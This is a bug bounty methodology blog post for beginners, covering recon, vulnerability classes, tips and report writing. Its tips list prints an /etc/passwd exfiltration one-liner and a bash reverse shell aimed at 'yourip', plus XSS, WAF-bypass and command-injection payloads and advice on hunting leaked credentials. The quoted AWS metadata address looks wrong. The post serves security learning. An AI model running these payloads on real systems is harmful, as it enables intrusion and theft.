Bug Bounty Methodology (TTP- Tactics, Techniques, and Procedures) V 2.0

Sanyam Chawla
30 min read · Oct 5, 2019


Hello folks, I am Sanyam Chawla (@infosecsanyam). I hope your hunting is going very well.

TL;DR

This is the second write-up on bug bounty methodology (TTP). Here is my first write-up about the Bug Hunting Methodology; read it if you missed it. I am very glad you liked that blog so much :). Most people are trying to find the right path to start in bug bounty; the usual questions are how to find bugs on targets and where to start hunting. For this reason, I have planned one more write-up on the bug bounty topic as a contribution to the infosec community.

What’s new in this blog? This blog mainly focuses on Tactics, Techniques, and Procedures for hunting in bug bounty. This write-up is purely for newcomers to the bug bounty community (noobs to leets). The blog is split into 3 parts, where I break things down to be as easy as possible. The first part gives an idea of the basic concepts: a basic programming language, networking concepts and reconnaissance. The second part gives an idea about common vulnerabilities, proofs of concept, bug bounty tips, tools, techniques and tutorials for self-study. The third part gives step-by-step ideas on reporting your findings in a clear way. This blog contains resources that I have collected from all over the internet, from different blogs, and adds them here to make one TTP that contains everything about getting started in bug bounty.

If you are an infosec beginner or a “bounty curious” leet hacker, this is the post for you!

So let’s start hunting without wasting time!! I hope you will learn something new after reading this blog.

What is Bug Bounty?

A bug bounty program, also called a vulnerability reward program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs.

To define Bug Bounty in a simple line: “Bug Bounty is a reward paid to an Ethical Hacker for identifying and disclosing a potential security bug found in a participant’s Web, Mobile, and Infrastructure.”

Part — 1 — Learn Basic Concepts

This part focuses on beginners, to share the right path before going into bug bounty. This phase is also for those who have already tried bug hunting but failed for some reason, such as the basic concepts not being clear. It gives an idea about the basics of programming, network protocols, automation and the reconnaissance process.

Let's get some idea about programming languages!!

Learn to write the code then you can easily break it

Below are some programming language blogs which I suggest for getting a basic understanding of these languages.

HTML:

JavaScript:

PHP:

Java:

SQL(Structured Query Language):

Resources to Learn Basics

What is HTTP?

What is Web?

Networking Concepts :

A basic idea of networking is very important for anyone who is using a computer. Here are some blogs that cover networking concepts:

Basics of Linux commands :

Feeling lazy about doing the same task as a daily routine?

Let's start learning some automation languages for bug hunting :)

Python

Golang

Bash

Conference notes for automation

You can learn the above languages to do automation tasks and create your own tools to work faster and more efficiently.

After clearing the basic concepts we are getting near the bug bounty part, but before going there I will share some ideas about the reconnaissance and information gathering part!!

Reconnaissance & Enumeration ( Information Gathering)

The thing you need to remember: in bug bounty programs there is a lot of competition. When you’re taking part in a bug bounty program, you’re up against thousands of other people who are taking part in the same program. For this reason, it’s important to think out of the box and to think differently.

What is Recon?

The important part is that recon comes first, in order to determine the target(s). This normally consists of company and partner names, employee names, identification of technology vendors in use, identification of public IP ranges, and primary top-level domains.

What is Enumeration?

Enumeration is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target.

The following recon map, which I found on Twitter, is very interesting. Use it wisely.

Below are some tips for proper enumeration:-

After learning some basics about programming, networking and recon concepts, let's move to the hunting part.

Part #2 — Vulnerabilities / POC / Tools / Bugbounty Tips

This part is basically for learning about web application vulnerabilities, tools, techniques and procedures (POC — Vulnerabilities).

Books for reading about Bug Hunting Vulnerabilities

Below are some books on web application penetration testing methodology and hunting the web. Through these, you learn the basics and essentials of penetration testing and bug hunting.

Web Security books

Mobile Hacking Books

Now at this point I’ll say you have done good enough research.

Practice makes Perfect!

Below are some vulnerable machines and websites for hands-on practice before going to hunt on live websites.

After spending a good amount of time practicing and learning on vulnerable machines and websites, we can now jump into bug bounty programs to test in real-life environments.

Following “10 rules of Bug Bounty”

  • Targeting the Bug Bounty Program
  • How do you Approach the Target ?
  • Don’t Expect Anything !
  • Less Knowledge about Vulnerabilities and Testing Methodologies
  • Surround yourself with Bug Bounty Community to keep yourself Updated
  • AUTOMATION
  • GET BOUNTY or GET EXPERIENCE
  • FIND THE “BUG” or FIND A “BUG’S CHAIN”
  • Read Master Path and Create your own path
  • RELAX & ENJOY LIFE

Bug Bounty Platforms :–

After doing reconnaissance and information gathering on a particular target, it is now time to hunt for some common vulnerabilities, which you should give priority to finding when you do bug hunting:-

Cross-Site Scripting (XSS)

XSS enables attackers to inject client-side scripts into web pages to get user information.

References:

Cross Site Scripting Tutorial & Practical

Some POCs:

SQL Injection :

SQL injection is a kind of injection vulnerability in which the attacker tries to inject arbitrary pieces of malicious data (code) into the input fields to get data from the database.

References :

SQL Injection Practice Lab

Some POC:

Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.

References:

Some POC

Remote Code Execution (RCE)

In RCE an attacker is able to execute arbitrary commands or code on a target machine.

References

Some POC

Insecure Direct Object Reference (IDOR)

In IDOR an application provides direct access to objects based on the user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly.

References to read:

Some POCs:

Unrestricted File Upload

As the name suggests, unrestricted file upload allows a user to upload a malicious file to a system, which can then be further exploited for code execution.

References

Some POCs:

XML External Entity Attack (XXE)

XXE is an attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

References

Some POCs:

Local File Inclusion (LFI)

The file inclusion vulnerability allows an attacker to include a file, usually by exploiting a “dynamic file inclusion” mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

References:

Some POCs:

Subdomain Takeover

The process of registering a non-existing domain name to gain control over another domain.

References

Some POCs:

Server-Side Request Forgery (SSRF)

With SSRF the attacker can abuse functionality on the server to read or update internal resources.

References:

Some POCs:

Deserialization

Insecure deserialization is one of the OWASP Top 10 issues; it allows attackers to transfer a payload using serialized objects. This happens when integrity checks are not in place and deserialized data is not sanitized or validated.

POC

Race Condition

Business Logic Flaw

Authentication Bypass

Brute Force

HTTP Header Injection

Email Related

Money Stealing

CSS Injection :

EXIF Geolocation Data Not Stripped From Uploaded Images :

Chaining Bugs :

I will share some great write-ups in which the researcher exploits a chain of vulnerabilities, from low-severity vulnerabilities to critical ones.

Open Redirection to XSS

Open Redirection to OAuth Token Stealing

Self XSS into good XSS:

LFI to RCE:

SSRF to XSS

SSRF to RCE:

SSTI to RCE:

Others

So these were some common issues that you should look for while bug hunting. Below are topics on which you should do some research and read the blogs and proofs of concept.

Read vulnerability POCs (Proofs of Concept) and write-ups from other hackers

Now that you have an understanding of security vulnerabilities, it’s time to start checking out what other hackers are finding in the wild. Luckily the security community is quite generous with sharing knowledge, and we’ve collected a list of write-ups & tutorials:

Now let’s get to the YouTube channel links. These channels are shared by hackers, who upload their video POCs after the issues are fixed, as per responsible disclosure. Watch them once.

Any channel link missing? Kindly add it in the comments.

Also follow http://h1.nobbd.de/ to be updated with HackerOne public bug reports. You can learn a lot from them.

Open Source Tools list for Bug Hunting

Subdomain Finding Websites :

Github Open Source tools for Subdomain Finding :-

Also, don’t limit yourself to subdomains; try extracting vhosts with tools like:-

Open Source tool list :-

Popular Google Dorks (for finding bug bounty websites)

  • site:.eu responsible disclosure
  • inurl:index.php?id=
  • site:.nl bug bounty
  • “index of” inurl:wp-content/ (Identify WordPress Website)
  • inurl:”q=user/password” (for finding drupal cms )

Passive Reconnaissance

Payloads for Hunting

Bug Bounty Pro Tips

  • Pro Tip — Android applications can suffer from LFI and stored XSS just by injecting <iframe/src=/etc/hosts> into input fields. Payout: $4,500! by xer0dayz
  • Tip for finding SSRF by @roughwire
  • #bugbounty tip by @jmelika: To demonstrate XSS impact, don’t use alert(‘alert’). Determine whether session is stored in cookies or local storage and put that in the popup. cookie: alert(document.cookie) LocalStorage: alert(localStorage.getItem(‘access_token’))
  • #bugbounty tip by Jakemenaga: A cool tip to find Jenkins dashboards in Shodan: `http.favicon.hash:81586312`
  • CSRF tip by Mikhel: You can send a text/plain; application/json Content-Type header cross-domain without triggering CORS. The backend might think that the content type is application/json.
  • by @m0z : A useful tip for finding Full Path Disclosure vulnerabilities: drop an array ([] or even [1,2,3]) into a parameter. This can produce a full path disclosure error.
  • #BugBounty Tip by Prateek Tiwari: If you’ve found an IDOR where you’re able to change data of others then don’t jump out of your seat to report it > modify it to XSS payload & if inputs are not sanitized & variables are echo’d without getting escaped then IDOR>XSS>ATO
  • #Bugbounty Tip: If you want to know the name of an inside-site s3 bucket, just put %c0 into the URL.
  • #Bugbounty tip: if the target is using Cloudflare, dig in their DNS records and search for the origin IP address. If you attack the application directly by its IP, the Cloudflare WAF will not be there.
  • #Bugbounty Tip :Search Jira Instances in @Google query — inurl: jira AND intitle:login AND inurl:[company name]
  • #Bugbounty Tip by Jason Haddix: Found a 401/403, basic auth, or domain that seems interesting but is somehow locked down? Look at its archive.org/web/ entries. Sometimes you win instantly with API keys or a URL structure that you can forcefully browse to unprotected content still there.
  • #Bugbounty Tip by Sri Ram: When starting a program, use this dork: site:prog.com inurl:lang= or inurl:locale=. Most of the time you will get a CRLF injection in there if it’s being reflected.
  • #Bugbounty Tip by Emad Shanab:- Oracle WebLogic Server UDDI Explorer SSRF bug Google dork: inurl:/uddiexplorer
  • #Bugbounty tip by Avinash Jain (@logicbomb_1):- To discover deployed on GitHub for subdomain takeover, the following Google dork can be used: intext:“There isn’t a GitHub Pages site here” and intitle:“Site not found . GitHub Pages”
  • #Bugbounty tip by @knowledge_2014:- Try blind XSS injection into the User-Agent or Referer/Origin headers; in case the payload seems not to execute, try again with URL encoding or double encoding. Sometimes it works like a charm!!
  • #Bugbounty tip by @404death :- XSs Payload <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
  • #Bugbounty tip by @SpenGietz:- #AWS tip: Did you know that even though the majority of the EC2 metadata API is disabled in AWS Glue Dev Endpoints, you can still retrieve temporary credentials for the attached role by curling “http://169.254.168.254/latest/meta-data/iam/security-credentials/dummy”?
  • #Bugbounty tip by @knowledge_2014:- Most of the time when you test a REST API you will see PATCH/PUT/DELETE requests. Change the request order to see which behavior the app has as output.
  • #Bugbounty tip by @ESec haxor:- A little trick to try to bypass some filters: use %0D! = <! — */’*/!>%0D<svg/onload=confirm’1’//
  • #Bugbounty tip:- Finding Drupal: inurl:”/user/register” “Powered by Drupal” -CAPTCHA -”Access Denied” or inurl:”user/register?element_parents=account/mail” inurl:”*drupal_ajax”
  • #Bugbounty tip by @c1h2e1:- #BugBounty #BugBountyTips #bugbountytip via Burp Suite search to find some open redirects: search “=http” or “=aHR0” (base64-encoded http) from “Request header” with status code 30X. You can also use this tip to find some SSRF.
  • #Bugbounty Tip by Sanyam Chawla:- Read ‘The Web Application Hacker’s Handbook’ once; you will understand the basics of web apps, then it’s easy to exploit the code.
  • Focus on enumeration part. Enumeration is a key.
  • #Bugbounty Tip by Vanshit:- Bypass AWS WAF: add “<!” (without quotes) before your payload and bypass that WAF, e.g. <!<script>confirm(1)</script>
  • Try to recon https://storage.googleapis.com/Org-name-here; you may find internal documentation which isn’t supposed to be public.
  • If you got a ‘Subdomain Takeover’, don’t report it yet; look at the main site/app to gain privileges, like a potential CSP policy bypass (or session hijacking via Set-Cookie: *.domain.com).
  • Always bruteforce http://subdomain.corp.website.com and *.dev.*
  • Look for port 9200 (Elasticsearch) and find juicy stuff. Use shodan.io with the org:”org name” query.
  • Found an s3 bucket behind the CDN? Change to https, it might reveal it.
  • Search for public Trello boards of companies, to find login credentials, API keys, etc. or if you aren’t lucky enough, then you may find companies’ Team Boards sometimes with tasks to fix security vulnerabilities
  • Remember that GitHub is your friend — check dotfiles of the company’s employees — search for DevOps projects shared (forked) between employees (Ansible, Cassandra, Azure, ..) => you get login credentials, API keys, private keys — always follow the manual approach.
  • Use https://cse.google.com/cse/all and create a custom search for *http://target.com , It works neat for targets with big scope.
  • Blind RCE — Grabs /etc/passwd and dumps it to your netcat listener via POST `cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/`
  • Blind RCE-turn it in to a reverse shell! |`bash -i >& /dev/tcp/yourip/yourport 0>&1`
  • Sometimes XSS payload: <sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”> <iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>
  • Search for hidden (and visible) input fields and try to set the value via GET… a lot of web apps still use $_REQUEST… you will be surprised.
  • If you have a reflected value -> check for HTML/script injection.
  • If the server only allows GET and POST methods, then try adding “X-HTTP-Method-Override: PUT” to achieve RCE via the PUT method.
  • If you have found server (http://foo.company.com ) which redirects you immediately to http://bar.company.com , always run resources enumeration (dirb, wfuzz etc.) against http://foo.company.com You can find something “hidden” sometimes
  • It’s possible to bypass #CSP with the following : #JSONP: <script src=”https://trustedsite/jsonp?callback=payload“> #AngularJS <script src=”https://trustedsite/angularjs/1.1.3/angularjs.min.js“> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
  • XSS on S3 buckets alerts on the s3 domain; it’s a low-priority bug. Better to find a reflected XSS on the main domain and iframe it into the S3 XSS. You can get an account takeover.
  • Change the User-Agent to your blind XSS payload and traverse the site, like visiting site links, filling some forms etc. Sometimes blind XSS may fire if you are lucky enough.
  • A single #RCE payload to rule them all, easy 6000$: `1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS}`
  • If you get a shell on a machine with ~/.aws/credentials, further escalate to the actual bucket or EC2 instances. Commands: `aws s3 ls s3://XXX/directory/ --profile username` and `aws ec2 describe-instances --profile username`.
  • Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc. <iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)”> iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.
  • Sometimes user input is reflected into a value without any quotations. Eg:<input value={input}> Just add a space and you can now inject onfocus=alert(0) autofocus for XSS! Works even against htmlspecialchars().
  • Port 50070 Hadoop: no authentication, access to logs and read/write access to directories.
  • Hunting for endpoints while bug hunting: the browser developer tools could be handy for you. Press ctrl+shift+j, click on Network and reload the page; you will find a few endpoints and URLs, and you can find subdomains too.
  • If you want to put spaces in a cmd: #<!ENTITY xxe SYSTEM “expect://ls$IFS-la$IFS/”>]>
  • Captcha bypass: the captcha was generated based on a given MD5 string — wrote a bot to randomly generate the MD5 of a 6-character string and use it as the captcha to log in!
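The text/plain CSRF tip in the list above (Mikhel's tip) works because browsers send text/plain bodies cross-origin without a CORS preflight, so a JSON endpoint that parses whatever arrives is forgeable. The following request guard is an added defensive example, not code from the original post; the allowlisted origin and header values are constructed for illustration.

```python
# Added example (not from the original post): a server-side guard for a JSON
# API that blocks the text/plain cross-origin CSRF trick. A browser can send
# text/plain, multipart/form-data and application/x-www-form-urlencoded bodies
# cross-site without a CORS preflight, while application/json triggers one.
# The guard therefore insists on the exact application/json media type and
# validates the Origin (or Referer) header against an allowlist.
from typing import Mapping, Optional, Tuple

ALLOWED_ORIGINS = {"https://app.example.com"}  # constructed example allowlist
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def media_type(content_type: Optional[str]) -> str:
    """Return the lowercase media type without parameters.

    'text/plain; application/json' -> 'text/plain', which is exactly how a
    backend that only does a substring match on 'application/json' gets fooled.
    """
    if not content_type:
        return ""
    return content_type.split(";", 1)[0].strip().lower()


def origin_of(url: str) -> str:
    """Reduce a Referer URL to its scheme://host[:port] origin."""
    return "/".join(url.split("/", 3)[:3])


def csrf_check(method: str, headers: Mapping[str, str]) -> Tuple[bool, str]:
    """Decide whether a state-changing JSON request may be processed.

    Returns (allowed, reason). Header names are matched case-insensitively.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"

    # 1. Exact media type. text/plain is a CORS "simple" type and reaches the
    #    server cross-site without preflight; application/json does not.
    if media_type(h.get("content-type")) != "application/json":
        return False, "content-type must be application/json"

    # 2. Origin must be present and allowlisted. Fetch/XHR attach Origin on
    #    every cross-origin request, so a missing Origin on a state-changing
    #    request is treated as suspicious, not as same-origin.
    origin = h.get("origin")
    if origin is None:
        referer = h.get("referer")
        if not referer:
            return False, "missing Origin/Referer"
        origin = origin_of(referer)
    if origin not in ALLOWED_ORIGINS:
        return False, "origin not allowed: " + origin
    return True, "ok"
```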
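The unquoted-attribute XSS tip above (`<input value={input}>`) is a template bug, not an escaping bug: `htmlspecialchars()` encodes `<`, `>`, `&` and quotes, but a space still ends an unquoted attribute value. The following added example (not code from the original post) renders the same input with the vulnerable and the hardened template and parses the result the way a browser would, to show that only quoting the attribute keeps the injected text inside the value.

```python
# Added example (not from the original post): why escaping alone does not fix
# the unquoted attribute case, and the one-line template change that does.
# Python's html.escape(s, quote=True) behaves like PHP's htmlspecialchars()
# with ENT_QUOTES: it encodes < > & " and '.
import html
from html.parser import HTMLParser
from typing import Dict, List


def render_unquoted(user_input: str) -> str:
    """Vulnerable template from the tip: escaped, but the value is not quoted."""
    return "<input value=" + html.escape(user_input, quote=True) + ">"


def render_quoted(user_input: str) -> str:
    """Hardened template: always quote attribute values and escape quotes."""
    return '<input value="' + html.escape(user_input, quote=True) + '">'


class _AttrCollector(HTMLParser):
    """Collects the attributes of each start tag, as a browser would parse them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        # Boolean attributes such as 'autofocus' arrive with value None.
        self.tags.append({k: (v if v is not None else "") for k, v in attrs})


def parsed_attributes(markup: str) -> Dict[str, str]:
    """Return the attribute map of the first tag in the markup."""
    p = _AttrCollector()
    p.feed(markup)
    p.close()
    return p.tags[0] if p.tags else {}


def has_event_handler(markup: str) -> bool:
    """True when the first tag gained any on* attribute (an injected handler)."""
    return any(name.lower().startswith("on") for name in parsed_attributes(markup))


# The input shape described in the tip: a space followed by new attributes.
TIP_INPUT = "x onfocus=alert(0) autofocus"  # constructed test input
```

With the unquoted template the parser sees three attributes (value, onfocus, autofocus); with the quoted template the whole string stays the value.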

Need more bug bounty tips? Go to Twitter and search the below hashtags:-

I hope the path guide I’m trying to share here clears doubts for many newcomers in bug bounty hunting.

Let’s move to Part #03

Part — 03 — Approach / Reporting

This part is all about selecting a target, the approach for finding bugs, and writing a good report after finishing testing.

Selecting and Approaching a Target?

For Bug bounty programs, First I’m going to review the scope of the target. There’s a huge difference between a scope such as *.facebook.com versus a small company’s single application test environment.

If the scope is big and they accept submissions for any of their servers, I’m going to start doing reconnaissance using search engines such as Google, Shodan, Censys, ARIN, etc. to discover subdomains, endpoints, and server IP addresses. This is a mix of Google dorking, scanning IP ranges owned by the company, server port scanning, etc.: anything that gives me information on servers that may be owned by that company.

When I have a list of servers, I start to perform nmap port and banner scanning to see what type of servers are running. Don’t forget to keep notes of everything you do. You may get some quick finds such as open SSH ports that allow password-based authentication. At this point I tend to stay away from reporting those smaller issues. I opt to spend more time looking for critical applications running on non-standard web ports, such as Jenkins, that may have a weak default configuration or no authentication in front of them.

Before I dig into the websites too deeply, I first do a quick run through the web servers looking for common applications such as WordPress, Drupal, Joomla etc. This is a mix of just browsing the sites manually or directory hunting using a wordlist, looking for sitemaps, looking at robots.txt, etc. I look for low-hanging fruit or surface bugs. There is no point focusing your efforts on those, but keeping track of them is really helpful. I understand the application workflow/requests via a proxy tool such as Burp or ZAP.

Then I dig into the website, check each request and response and analyse them. I’m trying to understand their infrastructure, such as how they’re handling sessions/authentication and what type of CSRF protection they have (if any).

Sometimes I use negative testing to provoke errors; this error information is very helpful for finding internal paths of the website. I spend most of my time trying to understand the flow of the application to get a better idea of what type of vulnerabilities to look for.

Once I’ve done all of that, depending on the rules of the program, I’ll start to dig in using scripts for word-list brute-forcing of endpoints. This can help with finding new directories or folders that you may not have been able to find just by using the website. These tend to be private admin panels, source repositories they forgot to remove such as /.git/ folders, or test/debug scripts. After that, check each form of the website, then try to push client-side attacks. Use multiple payloads to bypass client-side filters. The best tool for all of bug bounty hunting is “BURP SUITE”.

This is just my methodology for bug bounty hunting and penetration testing :)

My Tips & Tricks

  • Bug Bounty Hunting Tip #1- Always read the Source Code
  • Bug Bounty Hunting Tip #2- Try to Hunt Subdomains
  • Bug Bounty Hunting Tip #3- Always check the Back-end CMS & backend language (builtwith)
  • Bug Bounty Hunting Tip #4- Google Dorks is very helpful
  • Bug Bounty Hunting Tip #5- Check each request and response
  • Bug Bounty Hunting Tip #6- Active Mind — Out of Box Thinking

My Methodology for Bug Hunting

  • First review the scope
  • Perform reconnaissance to find valid targets
  • Find sub-domains through various tools: Sublist3r, VirusTotal etc.
  • Select one target, then scan the discovered targets to gather additional information (check CMS, server and all other information which I need)
  • Use google dorks for information gathering of a particular target
  • Review all of the services, ports and applications.
  • Fuzz for errors and to expose vulnerabilities
  • Attack vulnerabilities to build proof-of-concepts

Reporting a Vulnerability?

Legend has it that the best bug bounty hunters can write reports in their sleep. OK, jokes aside, while writing reports is a very important part of bug bounty hunting, we can simplify this whole process by following these basic guidelines.

Summary

The first section of your report should start with a brief summary introducing the reader to your finding. Summaries can be as simple as:

example.com is vulnerable to reflected XSS via the q parameter.

Or as detailed as:

https://imgur.com/vidgif/url endpoint is vulnerable to a SSRF vulnerability which allows an attacker to craft connections originating from imgur servers to any destination on the internet and imgur internal network and craft outgoing UDP-packets / telnet-based protocol sessions (for example, to connect to SMTP servers from imgur and send spam). [1]

Vulnerability Description

This section covers all the details related to your finding. State what you found again, make the technical points clear, and explain what causes the issue. There are exceptions though where this section can be skipped. There is a popular English idiom:

“A picture is worth a thousand words.”

The same can be said about an excellent proof of concept:

“A phenomenal security vulnerability proof of concept is worth a thousand words.”
– Probably Gandhi

Proof of concept

The proof of concept is where you really need to demonstrate the impact in the “flashiest” way possible. Make it as easy as possible for the program to see what the issue is. If your issue is cross-site scripting, then an alert(document.domain) can go a long way to help the program figure out where the issue lies.

Browsers verified in

Even if the issue is not browser-dependent, it is good practice to inform the program about what browser you used to trigger the vulnerability. This can help the team behind the bug bounty program reproduce your finding.

  • Google Chrome: visit chrome://version/
  • Mozilla Firefox: top-right menu icon → ? “Help” → “About Firefox”
  • Microsoft Internet Explorer: top-right cog → “About Internet Explorer”
  • Microsoft Edge: → “Settings” → scroll down

Mitigation

If you followed the advice in “How do I get started with bug bounty hunting?”, you should be capable of giving a brief description of how the bug bounty program should fix your finding. It is also a good idea to link to the relevant OWASP prevention cheat sheet.

Report Writing

Well, that’s all folks. Hopefully my way of doing basic recon can help you to properly select the target, map it out properly, hunt it down using the information you have gathered and, at the end, write a report. My suggestion for report writing is to read the blog https://blog.bugcrowd.com/advice-for-writing-a-great-vulnerability-report/

Good Report Examples:

1. https://hackerone.com/reports/73567

2. https://bugbountyguide.com/hunters/writing-reports.html

Some great resources for vulnerability report best practices are:

Well, I guess this is where I’ll end this blog, and I hope these resources will be helpful for your bug hunting. As mentioned before, this guide is basically for people who are absolutely new or are still looking for a proper way to decide what to learn first and from where.

Last but not least!

As a security researcher, it is very difficult to keep yourself up to date. For beginners, I recommend self-study and learning things on your own instead of going to any institute. Google is very wide; you can use it to explore and gain knowledge on each and every topic you want. It’s all about your passion for taking a step; after that you can achieve anything. Nothing is impossible to achieve. In reality, all I have achieved so far was by doing self-study on Google and through self-motivation. In the end, I’m not leet; I am still learning in the cybersecurity field and trying my best to share knowledge.

Credit goes to all the links below, from which I got useful information.

Failure will never overtake me if my determination to succeed is strong enough

Well, thanks for reading this write-up. I hope you like it. Feel free to connect with me through LinkedIn or Twitter.

If I missed something, kindly comment below so I can add it to the Bug Bounty / Infosec list. If you like this blog then share it with your friends.

Social media contact information as below.

About Me: https://cyberzombie.in/about/

Linkedin: www.linkedin.com/in/infosecsanyam

Twitter: https://twitter.com/9thplayer

Medium: https://medium.com/@infosecsanyam


Sanyam Chawla

OSCP || RedTeam Member @ Synack || PenTester || Bug Bounty Hunter